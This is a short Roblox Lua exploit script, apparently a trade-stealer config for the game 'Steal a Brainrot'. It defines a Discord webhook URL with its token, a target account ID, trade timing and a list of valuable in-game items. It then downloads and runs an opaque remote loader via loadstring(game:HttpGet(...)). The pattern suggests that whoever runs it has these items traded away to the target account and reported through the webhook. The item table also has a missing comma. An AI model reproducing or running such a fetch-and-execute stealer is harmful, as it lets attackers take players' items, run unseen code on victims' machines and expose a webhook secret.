getgenv().WEBHOOK_URL = "https://discord.com/api/webhooks/1477622763081433200/gZGTOJ9niWSvnW7ZML4q2V2LIBJpHYGrSu4BZsI7_emJU2sQ3mS7nUE9h-jbVByOeHlk"
getgenv().TARGET_ID = 9253975419
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Agarrini la Palini"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Chillin Chili"] = true,
    ["Chipso and Queso"] = true,
    ["Cooki and Milki"] = true,
    ["Dragon Cannelloni"] = true,
    ["Festive 67"] = true,
    ["Garama and Madundung"] = true,
    ["Gobblino Uniciclino"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Ketupat Bros"] = true,
    ["Ketupat Kepat"] = true,
    ["La Casa Boo"] = true,
    ["La Extinct Grande"] = true,
    ["La Jolly Grande"] = true,
    ["La Romantic Grande"] = true,
    ["La Spooky Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Lavadorito Spinito"] = true,
    ["Los Bros"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Primos"] = true,
    ["Los Puggies"] = true,
    ["Los Spaghettis"] = true,
    ["Money Money Puggy"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Reinito Sleighito"] = true,
    ["Spooky and Pumpky"] = true,
    ["Swag Soda"] = true,
    ["Swaggy Bros"] = true,
    ["Tacorita Bicicleta"] = true,
    ["Tang Tang Keletang"] = true,
    ["Tictac Sahur"] = true,
    ["Tralaledon"] = true,
    ["Tuff Toucan"] = true,
    ["W or L"] = true
    ["Los Chicleteiras"] = true

}
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/9a91b3ba6fb71423853ec2f885c42d67.lua"))()
